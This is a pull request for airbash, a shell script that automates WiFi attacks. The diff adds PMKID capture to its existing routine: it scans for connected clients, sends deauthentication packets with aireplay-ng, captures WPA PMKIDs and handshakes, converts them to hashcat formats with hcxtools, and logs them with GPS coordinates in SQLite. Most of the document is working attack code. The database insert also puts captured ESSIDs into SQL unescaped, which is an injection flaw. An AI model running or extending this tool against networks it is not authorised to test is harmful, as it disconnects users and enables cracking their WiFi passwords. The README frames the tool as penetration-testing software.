### PR TITLE
Implement PMKID support

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,14 +2,16 @@
 
 [![Codacy Badge](https://api.codacy.com/project/badge/Grade/6edeb433a77c47a5b7a670906fd06006)](https://app.codacy.com/app/tehw0lf/airbash?utm_source=github.com&utm_medium=referral&utm_content=tehw0lf/airbash&utm_campaign=Badge_Grade_Dashboard)
 
-Airbash is a POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing.
+Airbash is a POSIX-compliant, fully automated WPA PSK [PMKID](https://hashcat.net/forum/thread-7717.html) and handshake capture script aimed at penetration testing.
 It is compatible with Bash and Android Shell (tested on Kali Linux and Cyanogenmod 10.2) and uses [aircrack-ng](https://aircrack-ng.org) to scan for clients that are currently connected to access points (AP).
-Those clients are then deauthenticated in order to capture the handshake when attempting to reconnect to the AP.
-Verification of a captured handshake is done using aircrack-ng. If one or more handshakes are captured, they are entered into an SQLite3 database, along with the time of capture and current GPS data (if properly configured).
+Those clients are then deauthenticated in order to capture the PMKID and/or handshake when attempting to reconnect to the AP.
+Verification of captured data is done using hcxpcaptool and hcxpcapngtool from [hcxtools](https://github.com/ZerBea/hcxtools) by [ZeroBeat](https://github.com/ZerBea). If one or more PMKIDs and/or handshakes are captured, they are entered into an SQLite3 database, along with the time of capture and current GPS data (if properly configured).
 
 After capture, the database can be tested for vulnerable router models using `crackdefault.sh`.
 It will search for entries that match the implemented modules, which currently include algorithms to compute default keys for
 Speedport 500-700 series, Thomson/SpeedTouch, UPC 7 digits (UPC1234567) and HOTBOX routers.
+
+For more information on the PMKID attack, [New attack on WPA/WPA2 using PMKID](https://hashcat.net/forum/thread-7717.html) is a good read.
 
 ## Sample Run
 
@@ -23,15 +25,15 @@ aircrack-ng (for Android [android_aircrack](https://github.com/kriswebdev/androi
 
 SQLite3 (Android: installed by default on CyanogenMod 10.2)
 
-[wlanhc2hcx](https://github.com/ZerBea/hcxtools/blob/master/wlanhc2hcx.c) from [hcxtools](https://github.com/ZerBea/hcxtools) (Optional, used for converting .cap files to .hccapx files for hashcat)
+openssl for compilation of modules and hcxtools
 
-openssl for compilation of modules (optional, not used for handshake capture)
+hcxpcaptool and hcxpcapngtool from [hcxtools](https://github.com/ZerBea/hcxtools) for detection of PMKIDs and/or handshakes and conversion to hashcat formats
 
-In order to log GPS coordinates of handshakes, configure your coordinate logging software to log to .loc/\_.txt (the filename can be chosen as desired). Airbash will always use the output of `cat "$path$loc"*.txt 2>/dev/null | sed '2q;d'`, which equals to reading all .txt files in .loc/ and picking the second line. The reason for this way of implementation is the functionality of [GPSLogger](https://play.google.com/store/apps/details?id=com.mendhak.gpslogger&hl=en), which was used on the development device.
+In order to log GPS coordinates of access points, configure your coordinate logging software to log to .location/\_.txt (the filename can be chosen as desired). Airbash will always use the output of `cat "$path$loc"*.txt 2>/dev/null | sed '2q;d'`, which equals to reading all .txt files in .loc/ and picking the second line. The reason for this way of implementation is the functionality of [GPSLogger](https://play.google.com/store/apps/details?id=com.mendhak.gpslogger&hl=en), which was used on the development device.
 
 ## Calculating default keys
 
-After capturing a new handshake, the database can be queried for vulnerable router models. If a module applies,
+After capturing a new PMKID or handshake, the database can be queried for vulnerable router models. If a module applies,
 the default keys for this router series are calculated and used as input for aircrack-ng to try and recover
 the passphrase.
 
@@ -91,6 +93,8 @@ The database contains a table called `hs` with seven columns.
 `essid`: Name identifier
 
 `psk`: WPA Passphrase, if known
+
+`pmkid`: WPA PMKID, if captured
 
 `prcsd`: Flag that gets set by crackdefault.sh to prevent duplicate calculation of default keys if a custom passphrase was used.
 

--- a/install.sh
+++ b/install.sh
@@ -58,4 +58,4 @@ if [ ! -d "$installation_path/.location" ]; then
 fi
 
 # seed database
-sqlite3 "$installation_path/.database.sqlite3" "CREATE TABLE handshakes (id INTEGER PRIMARY KEY NOT NULL, latitude VARCHAR(12), longitude VARCHAR(12), bssid VARCHAR(17) UNIQUE, essid VARCHAR(255), psk VARCHAR(64), processed INT(1) DEFAULT NULL)"
+sqlite3 "$installation_path/.database.sqlite3" "CREATE TABLE captures (id INTEGER PRIMARY KEY NOT NULL, latitude VARCHAR(12), longitude VARCHAR(12), bssid VARCHAR(17) UNIQUE, essid VARCHAR(255), pmkid VARCHAR(255), psk VARCHAR(64), processed INT(1) DEFAULT NULL)"

--- a/src/airba.sh
+++ b/src/airba.sh
@@ -1,43 +1,80 @@
 # This is the airbash main script (https://github.com/tehw0lf/airbash)
 # Written by tehw0lf
-# This script is an automated WPA/WPA2 handshake collector which uses
-# software from https://aircrack-ng.org. First, the script will scan for
-# WiFi clients that are connected to access points. Then, each client receives
-# a deauthentication packet that should terminate its connection to the
-# access point, thus forcing a reconnect. In order to capture the handshake,
-# airodump is being run after sending the deauthentication packet. Verification
-# of a captured handshake is done using aircrack-ng
+# This script is an automated WPA/WPA2 PMKID and handshake collector which uses
+# software from https://aircrack-ng.org and https://github.com/ZerBea/hcxtools.
+# First, the script will scan for WiFi clients that are connected to access points.
+# Then, aireplay is run in deauthentication mode once for each client, which should
+# terminate its connection to the access point, thus forcing a reconnect.
+# In order to capture the handshake, airodump is being run after sending the
+# deauthentication packet. For verification and conversion, hcxpcapngtool and
+# hcxpcaptool from hcxtools by ZeroBeat are used for now, until hcxpcapngtool
+# is out of experimental state.
 
-check_for_handshake() {
-  # checks a handshake (passed by file name) using aircrack-ng
-  # returns 1 on success and 0 on failure
-  for captured_bssid in $(ls "$1"*.cap 2>/dev/null); do
-    if [ $("$AIRCRACK_BINARY" -a 2 "$captured_bssid" -w "$wordlist_directory/"known_passwords.txt 2>/dev/null | grep -c valid) -eq 0 ]; then
-      aircrack_output=$("$AIRCRACK_BINARY" -a 2 "$captured_bssid" -w "$wordlist_directory/"known_passwords.txt 2>/dev/null | grep handshake)
-      if [ "$aircrack_output" == "" ]; then
-        handshake_captured=0
-      else      
-        handshake_row=$(echo "$aircrack_output" | awk '{print $5}')
-        if [ "$handshake_row" != "(0" ]; then
-          handshake_captured=1
-        fi
-      fi
+check_for_pmkid_or_handshake() {
+  # $1 = access point MAC address
+  # checks a .cap file for either PMKID or 4-way handshake using
+  # extract information to temporary folder and only move if successful
+  # returns "1" on success and "0" on failure
+  labcounter=$((labcounter + 1))
+  pmkid_or_handshake_captured="0"
+  tempdirectory="$base_directory/lab$labcounter"
+  mkdir "$tempdirectory"
+  $("$HCXPCAPTOOL_BINARY" --prefix-out="$tempdirectory/$1" "$1"*.cap &>/dev/null)
+  $("$HCXPCAPNGTOOL_BINARY" -o "$tempdirectory/$1.22000" "$1"*.cap &>/dev/null)
+  if [ $(ls "$tempdirectory" | grep -e "hccapx" -e "16800" -e "22000" | wc -l) -gt 0 ]; then
+    pmkid_or_handshake_captured="1"
+    $(sed -i -e s/\:/\*/g "$tempdirectory/$1.16800" &>/dev/null)
+    cp "$tempdirectory"/* "$output_directory"/
+  fi
+  rm -rf "$tempdirectory"
+}
+
+check_all_and_update_database() {
+  # check all captures and update the database with the new information
+  cd "$base_directory"
+  for mac_address in $(ls *.cap 2>/dev/null | cut -d '-' -f 1); do
+    if [ "$mac_address" == "" ]; then
+      continue
     fi
-    aircrack_output=""
-    handshake_row=""
+    if [ $(ls "$output_directory/$mac_address"* 2>/dev/null | wc -l) -gt 0 ]; then
+      #echo "found $mac_address, saving to db"
+      save_to_database "$output_directory/$mac_address"
+      continue
+    fi
+    check_for_pmkid_or_handshake "$mac_address"
+    if [ "$pmkid_or_handshake_captured" == "1" ]; then
+      #echo "NEW $mac_address saved"
+      save_to_database "$output_directory/$mac_address"
+      pmkid_or_handshake_counter=$((pmkid_or_handshake_counter + 1))
+    fi
   done
 }
+
 kill_aireplay_processes() {
   # kill all instances of aireplay-ng to prevent locking
   for pid in $(pgrep $(basename "$AIREPLAY_BINARY")); do
     { kill $pid && wait $pid; } &>/dev/null
   done
 }
+
 kill_airodump_processes() {
   # kill all instances of airodump-ng to prevent locking
   for pid in $(pgrep $(basename "$AIRODUMP_BINARY")); do
     { kill $pid && wait $pid; } &>/dev/null
   done
+}
+
+save_to_database() {
+  # inserts information into the database (existing bssids will not be replaced as the column is UNIQUE)
+  location_output=$(sed '2q;d' "$location_directory/"*.txt 2>/dev/null)
+
+  bssid=$(cat "$1".networklist | uniq | awk -F ':' '{print toupper($1)}' | sed -e 's/[0-9A-F]\{2\}/&:/g' -e 's/:$//')
+  essid=$(cat "$1".essidlist)
+  pmkid=$(cat "$1".16800 2>/dev/null)
+  latitude=$(echo "$location_output" | awk -F ',' '{print $2}')
+  longitude=$(echo "$location_output" | awk -F ',' '{print $3}')
+  "$SQLITE3_BINARY" "$base_directory/$database_filename" "INSERT INTO captures (latitude, longitude, bssid, essid, pmkid) VALUES('$latitude', '$longitude', '$bssid', '$essid', '$pmkid');" 2>/dev/null
+
 }
 
 # enviro stuff
@@ -46,7 +83,8 @@ AIRCRACK_BINARY=$(which aircrack-ng)
 AIRODUMP_BINARY=$(which airodump-ng)
 AIREPLAY_BINARY=$(which aireplay-ng)
 SQLITE3_BINARY=$(which sqlite3)
-HC2HCX_BINARY=$(which wlanhc2hcx)
+HCXPCAPTOOL_BINARY=$(which hcxpcaptool)
+HCXPCAPNGTOOL_BINARY=$(which hcxpcapngtool)
 
 if [ -z "$AIRCRACK_BINARY" ]; then
   echo "Make sure aircrack-ng is on your PATH or in $base_directory!"
@@ -64,23 +102,27 @@ if [ -z "$SQLITE3_BINARY" ]; then
   echo "Make sure sqlite3 is on your PATH or in $base_directory!"
   exit
 fi
-if [ -z "$HC2HCX_BINARY" ]; then
+if [ -z "$HCXPCAPTOOL_BINARY" ]; then
   echo -e "Make sure hcxtools' wlanhc2hcx is on your path or in $base_directory!\n  Source available at https://github.com/ZerBea/hcxtools/blob/master/wlanhc2hcx.c"
-  echo ".hccapx conversion unavailable"
+  echo "conversion unavailable"
+fi
+if [ -z "$HCXPCAPNGTOOL_BINARY" ]; then
+  echo -e "Make sure hcxtools' wlanhc2hcx is on your path or in $base_directory!\n  Source available at https://github.com/ZerBea/hcxtools/blob/master/wlanhc2hcx.c"
+  echo "22000 conversion unavailable"
 fi
 
 # configure path variables
 base_directory=$(realpath .)
 database_filename=".database.sqlite3"
 blacklist=".blacklist"
-handshake_directory="$base_directory/.handshakes"
+output_directory="$base_directory/.output"
 location_directory="$base_directory/.location"
 wordlist_directory="$base_directory/.wordlists"
 initial_scan_prefix="initlist"
 initial_scan_file="$initial_scan_prefix-01.csv"
 
 # create nonexisting paths and files
-mkdir "$handshake_directory" &>/dev/null
+mkdir "$output_directory" &>/dev/null
 touch "$base_directory/$blacklist"
 kill_airodump_processes
 
@@ -88,18 +130,21 @@ kill_airodump_processes
 rm -f "$base_directory/"initlist &>/dev/null
 rm -f "$base_directory/"*.csv &>/dev/null
 rm -f "$base_directory/"*.cap &>/dev/null
+rm -f "$base_directory/lab"* &>/dev/null
 
 # initial 20 second scan to determine targets
-{ "$AIRODUMP_BINARY" -w $base_directory/$initial_scan_prefix -o csv $INTERFACE &>/dev/null; } &
+{ "$AIRODUMP_BINARY" -w "$base_directory/$initial_scan_prefix" -o csv "$INTERFACE" &>/dev/null; } &
 sleep 20
 kill_airodump_processes
+labcounter=0
+pmkid_or_handshake_counter=0
 access_point_counter=1
-$(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | awk -F ',' '{print $6}' | grep -v [\(] | sort -u | sed '/^\s*$/d' >"$base_directory/"num_access_points.lst)
+$(tr -d ' ' <$base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | awk -F ',' '{print $6}' | grep -v [\(] | sort -u | sed '/^\s*$/d' >"$base_directory/"num_access_points.lst)
 num_access_points=$(wc -l <"$base_directory/"num_access_points.lst)
 $(rm -f "$base_directory/"num_access_points.lst)
 # stage 1: access points (scan and apply filters)
-for access_point in $(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | awk -F ',' '{print $6}' | grep -v [\(] | sort -u | sed '/^\s*$/d'); do
-  channel=$(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null | grep $access_point | awk -F ',' 'NR==1{print $4}')
+for access_point in $(tr -d ' ' <$base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | awk -F ',' '{print $6}' | grep -v [\(] | sort -u | sed '/^\s*$/d'); do
+  channel=$(tr -d ' ' <$base_directory/$initial_scan_file 2>/dev/null | grep $access_point | awk -F ',' 'NR==1{print $4}')
   echo "_$access_point_counter/$num_access_points    "
   { "$AIRODUMP_BINARY" -c $channel --bssid $access_point -w $base_directory/$access_point -o pcap $INTERFACE &>/dev/null; } &
   sleep 2
@@ -110,7 +155,7 @@ for access_point in $(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null
     access_point_counter=$((access_point_counter + 1))
     continue
   fi
-  if [ $("$SQLITE3_BINARY" "$base_directory/$database_filename" "SELECT * FROM handshakes WHERE bssid='$access_point'" 2>/dev/null | grep -c $access_point) -gt 0 ]; then
+  if [ $("$SQLITE3_BINARY" "$base_directory/$database_filename" "SELECT * FROM captures WHERE bssid='$access_point'" 2>/dev/null | grep -c $access_point) -gt 0 ]; then
     # handshake for access point present in database
     echo "x         "
     kill_airodump_processes
@@ -125,20 +170,20 @@ for access_point in $(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null
     continue
   fi
   client_counter=1
-  $(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | grep -v [\(] | sed '/^\s*$/d' | awk -F ',' '{print $1}' >"$base_directory/"num_clients.lst)
+  $(tr -d ' ' <$base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | grep -v [\(] | sed '/^\s*$/d' | awk -F ',' '{print $1}' >"$base_directory/"num_clients.lst)
   num_clients=$(wc -l <"$base_directory/"num_clients.lst)
   rm -f "$base_directory/"num_clients.lst
   # stage 2: deauthenticate clients and try to capture handshake
-  for client in $(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | grep -v [\(] | sed '/^\s*$/d' | awk -F ',' '{print $1}'); do
-    client_bssid=$(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | grep -v [\(] | sed '/^\s*$/d' | grep $client | grep $access_point | awk -F ',' '{print $6}')
+  for client in $(tr -d ' ' <$base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | grep -v [\(] | sed '/^\s*$/d' | awk -F ',' '{print $1}'); do
+    client_bssid=$(tr -d ' ' <$base_directory/$initial_scan_file 2>/dev/null | awk '/Station/{y=1;next}y' | grep -v [\(] | sed '/^\s*$/d' | grep $client | grep $access_point | awk -F ',' '{print $6}')
     if [ "$client_bssid" == "$access_point" ]; then
       echo "__$client_counter/$num_clients    "
       # send a single deauthentication packet
       { "$AIREPLAY_BINARY" -0 1 -a $access_point -c $client -F $INTERFACE &>/dev/null; } &
       sleep 5
-      handshake_captured=0
-      check_for_handshake "$base_directory/$access_point"
-      if [ $handshake_captured -eq 1 ]; then
+      check_for_pmkid_or_handshake "$access_point"
+      if [ "$pmkid_or_handshake_captured" == "1" ]; then
+        pmkid_or_handshake_counter=$((pmkid_or_handshake_counter + 1))
         kill_aireplay_processes
         break
       fi
@@ -153,34 +198,10 @@ for access_point in $(tr -d ' ' < $base_directory/$initial_scan_file 2>/dev/null
   access_point_counter=$((access_point_counter + 1))
 done
 rm -f "$base_directory/"initlist*
-handshake_counter=0
+
 # finalize by inserting data for captured handshakes into database
-# and converting the .pcap to a .hccapx file for use with hashcat
-for capture_file in $(ls "$base_directory/"*.cap 2>/dev/null); do
-  if [ $("$AIRCRACK_BINARY" -a 2 "$capture_file" -w "$wordlist_directory/"known_passwords.txt 2>/dev/null | grep -c valid) -eq 0 ]; then
-    aircrack_output=$("$AIRCRACK_BINARY" -a 2 "$capture_file" -w "$wordlist_directory/"known_passwords.txt 2>/dev/null | grep handshake)
-    if [ "$aircrack_output" == "" ]; then
-      continue
-    fi
-    location_output=$(sed '2q;d' "$location_directory/"*.txt 2>/dev/null)
-    if [ $(echo "$aircrack_output" | awk '{print $5}') == "(0" ]; then
-      rm -f "$capture_file"
-    else
-      bssid=$(echo "$aircrack_output" | awk '{print $2}')
-      essid=$(echo "$aircrack_output" | awk '{for (F=3;F<=NF-3;++F) printf " %s", ($F)}')
-      essid=${essid:1:${#essid}}
-      latitude=$(echo "$location_output" | awk -F ',' '{print $2}')
-      longitude=$(echo "$location_output" | awk -F ',' '{print $3}')
-      "$SQLITE3_BINARY" "$base_directory/$database_filename" "INSERT INTO handshakes(latitude, longitude, bssid, essid) VALUES('$latitude', '$longitude', '$bssid', '$essid');" 2>/dev/null
-      "$AIRCRACK_BINARY" "$capture_file" -J "$capture_file" &>/dev/null
-      "$HC2HCX_BINARY" -o "$handshake_directory/$bssid".hccapx "$capture_file".hccap &>/dev/null
-      mv "$capture_file" "$handshake_directory/"
-      rm -f "$capture_file".hccap
-      handshake_counter=$((handshake_counter + 1))
-    fi
-  else
-    rm -f "$capture_file"
-  fi
-done
+# and converting the .cap file for use with hashcat
+check_all_and_update_database
+rm -f "$base_directory/"*.cap &>/dev/null
 echo "_______"
-echo "$handshake_counter!"
+echo "$pmkid_or_handshake_counter!"

--- a/src/airba.sh
+++ b/src/airba.sh
@@ -68,7 +68,7 @@ save_to_database() {
   # empty bssids will not be saved
   location_output=$(sed '2q;d' "$location_directory/"*.txt 2>/dev/null)
 
-  bssid=$(cat "$1".networklist | uniq | awk -F ':' '{print toupper($1)}' | sed -e 's/[0-9A-F]\{2\}/&:/g' -e 's/:$//')
+  bssid=$(uniq "$1".networklist | awk -F ':' '{print toupper($1)}' | sed -e 's/[0-9A-F]\{2\}/&:/g' -e 's/:$//')
   essid=$(cat "$1".essidlist)
   pmkid=$(cat "$1".16800 2>/dev/null)
   latitude=$(echo "$location_output" | awk -F ',' '{print $2}')


### PR DESCRIPTION
A bit late to the party, but better late than never!
In addition to 4-way handshakes, airbash now also detects and converts PMKIDs 🎉 

The PMKID is a hash which is sent by certain access points ["in the RSN IE (Robust Security Network Information Element) of a single EAPOL frame"](https://hashcat.net/forum/thread-7717.html). This means that client-less attacks are possible, as the attacker can potentially generate the needed packets themselves.

Closes #17 